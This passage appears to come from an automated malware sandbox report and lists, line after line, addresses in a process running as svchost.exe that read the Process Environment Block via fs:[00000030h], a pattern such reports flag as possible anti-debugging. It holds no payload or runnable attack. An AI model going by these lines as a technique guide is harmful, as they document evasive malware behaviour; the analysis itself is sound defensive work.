              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008324 mov eax, dword ptr fs:[00000030h]1_2_03008324
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008324 mov eax, dword ptr fs:[00000030h]1_2_03008324
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300634F mov eax, dword ptr fs:[00000030h]1_2_0300634F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402A0 mov eax, dword ptr fs:[00000030h]1_2_02F402A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402A0 mov eax, dword ptr fs:[00000030h]1_2_02F402A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov ecx, dword ptr fs:[00000030h]1_2_02FC62A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E284 mov eax, dword ptr fs:[00000030h]1_2_02F6E284
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E284 mov eax, dword ptr fs:[00000030h]1_2_02F6E284
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]1_2_02FB0283
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]1_2_02FB0283
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]1_2_02FB0283
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]1_2_02F34260
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]1_2_02F34260
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]1_2_02F34260
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2826B mov eax, dword ptr fs:[00000030h]1_2_02F2826B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A250 mov eax, dword ptr fs:[00000030h]1_2_02F2A250
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36259 mov eax, dword ptr fs:[00000030h]1_2_02F36259
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA250 mov eax, dword ptr fs:[00000030h]1_2_02FEA250
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA250 mov eax, dword ptr fs:[00000030h]1_2_02FEA250
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB8243 mov eax, dword ptr fs:[00000030h]1_2_02FB8243
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB8243 mov ecx, dword ptr fs:[00000030h]1_2_02FB8243
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2823B mov eax, dword ptr fs:[00000030h]1_2_02F2823B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02F4E3F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02F4E3F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02F4E3F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F663FF mov eax, dword ptr fs:[00000030h]1_2_02F663FF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h]1_2_02FDE3DB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h]1_2_02FDE3DB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov ecx, dword ptr fs:[00000030h]1_2_02FDE3DB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h]1_2_02FDE3DB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD43D4 mov eax, dword ptr fs:[00000030h]1_2_02FD43D4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD43D4 mov eax, dword ptr fs:[00000030h]1_2_02FD43D4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEC3CD mov eax, dword ptr fs:[00000030h]1_2_02FEC3CD
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB63C0 mov eax, dword ptr fs:[00000030h]1_2_02FB63C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300625D mov eax, dword ptr fs:[00000030h]1_2_0300625D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]1_2_02F28397
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]1_2_02F28397
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]1_2_02F28397
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]1_2_02F2E388
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]1_2_02F2E388
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]1_2_02F2E388
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5438F mov eax, dword ptr fs:[00000030h]1_2_02F5438F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5438F mov eax, dword ptr fs:[00000030h]1_2_02F5438F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD437C mov eax, dword ptr fs:[00000030h]1_2_02FD437C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov ecx, dword ptr fs:[00000030h]1_2_02FB035C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA352 mov eax, dword ptr fs:[00000030h]1_2_02FFA352
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8350 mov ecx, dword ptr fs:[00000030h]1_2_02FD8350
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030062D6 mov eax, dword ptr fs:[00000030h]1_2_030062D6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C310 mov ecx, dword ptr fs:[00000030h]1_2_02F2C310
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50310 mov ecx, dword ptr fs:[00000030h]1_2_02F50310
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]1_2_02F6A30B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]1_2_02F6A30B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]1_2_02F6A30B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]1_2_02F2C0F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F720F0 mov ecx, dword ptr fs:[00000030h]1_2_02F720F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_02F2A0E3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F380E9 mov eax, dword ptr fs:[00000030h]1_2_02F380E9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB60E0 mov eax, dword ptr fs:[00000030h]1_2_02FB60E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB20DE mov eax, dword ptr fs:[00000030h]1_2_02FB20DE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF60B8 mov eax, dword ptr fs:[00000030h]1_2_02FF60B8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]1_2_02FF60B8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F280A0 mov eax, dword ptr fs:[00000030h]1_2_02F280A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC80A8 mov eax, dword ptr fs:[00000030h]1_2_02FC80A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004164 mov eax, dword ptr fs:[00000030h]1_2_03004164
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004164 mov eax, dword ptr fs:[00000030h]1_2_03004164
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3208A mov eax, dword ptr fs:[00000030h]1_2_02F3208A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5C073 mov eax, dword ptr fs:[00000030h]1_2_02F5C073
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32050 mov eax, dword ptr fs:[00000030h]1_2_02F32050
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6050 mov eax, dword ptr fs:[00000030h]1_2_02FB6050
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6030 mov eax, dword ptr fs:[00000030h]1_2_02FC6030
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A020 mov eax, dword ptr fs:[00000030h]1_2_02F2A020
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C020 mov eax, dword ptr fs:[00000030h]1_2_02F2C020
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030061E5 mov eax, dword ptr fs:[00000030h]1_2_030061E5
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB4000 mov ecx, dword ptr fs:[00000030h]1_2_02FB4000
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F601F8 mov eax, dword ptr fs:[00000030h]1_2_02F601F8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_02FAE1D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF61C3 mov eax, dword ptr fs:[00000030h]1_2_02FF61C3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF61C3 mov eax, dword ptr fs:[00000030h]1_2_02FF61C3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]1_2_02F2A197
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]1_2_02F2A197
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]1_2_02F2A197
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F70185 mov eax, dword ptr fs:[00000030h]1_2_02F70185
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEC188 mov eax, dword ptr fs:[00000030h]1_2_02FEC188
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEC188 mov eax, dword ptr fs:[00000030h]1_2_02FEC188
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4180 mov eax, dword ptr fs:[00000030h]1_2_02FD4180
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4180 mov eax, dword ptr fs:[00000030h]1_2_02FD4180
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C156 mov eax, dword ptr fs:[00000030h]1_2_02F2C156
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC8158 mov eax, dword ptr fs:[00000030h]1_2_02FC8158
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36154 mov eax, dword ptr fs:[00000030h]1_2_02F36154
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36154 mov eax, dword ptr fs:[00000030h]1_2_02F36154
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov ecx, dword ptr fs:[00000030h]1_2_02FC4144
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60124 mov eax, dword ptr fs:[00000030h]1_2_02F60124
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov ecx, dword ptr fs:[00000030h]1_2_02FDA118
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]1_2_02FDA118
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]1_2_02FDA118
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]1_2_02FDA118
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF0115 mov eax, dword ptr fs:[00000030h]1_2_02FF0115
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov ecx, dword ptr fs:[00000030h]1_2_02FDE10E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov ecx, dword ptr fs:[00000030h]1_2_02FDE10E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov ecx, dword ptr fs:[00000030h]1_2_02FDE10E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov ecx, dword ptr fs:[00000030h]1_2_02FDE10E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB06F1 mov eax, dword ptr fs:[00000030h]1_2_02FB06F1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB06F1 mov eax, dword ptr fs:[00000030h]1_2_02FB06F1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_02F6A6C7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]1_2_02F6A6C7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F666B0 mov eax, dword ptr fs:[00000030h]1_2_02F666B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]1_2_02F6C6A6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34690 mov eax, dword ptr fs:[00000030h]1_2_02F34690
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34690 mov eax, dword ptr fs:[00000030h]1_2_02F34690
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F62674 mov eax, dword ptr fs:[00000030h]1_2_02F62674
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF866E mov eax, dword ptr fs:[00000030h]1_2_02FF866E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF866E mov eax, dword ptr fs:[00000030h]1_2_02FF866E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A660 mov eax, dword ptr fs:[00000030h]1_2_02F6A660
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A660 mov eax, dword ptr fs:[00000030h]1_2_02F6A660
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4C640 mov eax, dword ptr fs:[00000030h]1_2_02F4C640
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E627 mov eax, dword ptr fs:[00000030h]1_2_02F4E627
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F66620 mov eax, dword ptr fs:[00000030h]1_2_02F66620
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68620 mov eax, dword ptr fs:[00000030h]1_2_02F68620
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3262C mov eax, dword ptr fs:[00000030h]1_2_02F3262C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72619 mov eax, dword ptr fs:[00000030h]1_2_02F72619
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE609 mov eax, dword ptr fs:[00000030h]1_2_02FAE609
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
